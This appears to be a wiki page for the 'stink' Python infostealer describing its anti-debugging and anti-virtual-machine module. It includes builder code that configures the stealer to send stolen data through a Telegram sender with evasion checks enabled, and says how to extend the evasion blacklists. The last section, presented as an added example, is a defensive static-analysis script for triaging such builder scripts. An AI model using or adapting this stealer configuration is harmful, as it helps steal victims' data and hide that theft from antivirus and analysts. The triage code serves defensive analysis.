Anti‐debugging and anti‐virtual‐machine

Astaroth edited this page Nov 1, 2023 · 8 revisions

Introduction

stink includes a module that, before starting, checks whether the PC is a virtual machine and whether any debugging applications are running. If either is detected, stink terminates. This helps to get fewer detections from antiviruses and to hide where the data goes.

Customization

  1. By default, all checks are disabled. You can specify certain ones if necessary:

     ```python
     from stink import Stealer, Senders, Protectors

     if __name__ == '__main__':
         Stealer(
             senders=[
                 Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)
             ],
             protectors=[
                 Protectors.processes,
                 Protectors.virtual_machine
             ]
         ).run()
     ```

  2. You can also enable all checks:

     ```python
     from stink import Stealer, Senders, Protectors

     if __name__ == '__main__':
         Stealer(
             senders=[
                 Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)
             ],
             protectors=[
                 Protectors.all
             ]
         ).run()
     ```

  3. You can add additional usernames, MAC addresses, etc. to the blacklist in the `ProtectorConfig` class in the file `stink/helpers/config.py`.
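
For analysts triaging a recovered builder script, the following added example (not code from the stink project or this wiki) parses the source statically and reports which protectors and senders are configured, which tells you whether sandbox evasion is enabled and which exfiltration channel to look for. The names `triage` and `_members` and the sample script are constructed for illustration.

```python
import ast

# Constructed sample, shaped like the builder scripts shown on this page.
SAMPLE = '''
from stink import Stealer, Senders, Protectors as P

if __name__ == '__main__':
    Stealer(
        senders=[Senders.telegram(token="REDACTED", user_id=0)],
        protectors=[P.processes, P.virtual_machine]
    ).run()
'''

def _members(node, alias, cls):
    """Names X used as `<cls>.X` under node, resolving import aliases."""
    return sorted({n.attr for n in ast.walk(node)
                   if isinstance(n, ast.Attribute)
                   and isinstance(n.value, ast.Name)
                   and alias.get(n.value.id) == cls})

def triage(source):
    """Statically inspect Python source; the code is parsed, never executed.

    Limitation: only `from stink import ...` is resolved, not `import stink`.
    """
    tree = ast.parse(source)
    alias = {}  # local name -> name as exported by stink
    for node in ast.walk(tree):
        if (isinstance(node, ast.ImportFrom)
                and (node.module or "").split(".")[0] == "stink"):
            for a in node.names:
                alias[a.asname or a.name] = a.name
    report = {"imports_stink": bool(alias), "protectors": [], "senders": []}
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and alias.get(node.func.id) == "Stealer"):
            for kw in node.keywords:
                if kw.arg in ("protectors", "senders"):
                    report[kw.arg] += _members(kw.value, alias, kw.arg.capitalize())
    # Per the page, checks are off unless listed in `protectors`.
    report["evasion_enabled"] = bool(report["protectors"])
    return report

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A report with `evasion_enabled` set means the sample is configured to exit in an analysis VM or when debug tooling is running, so a detonation that shows no activity is not evidence that the sample is benign.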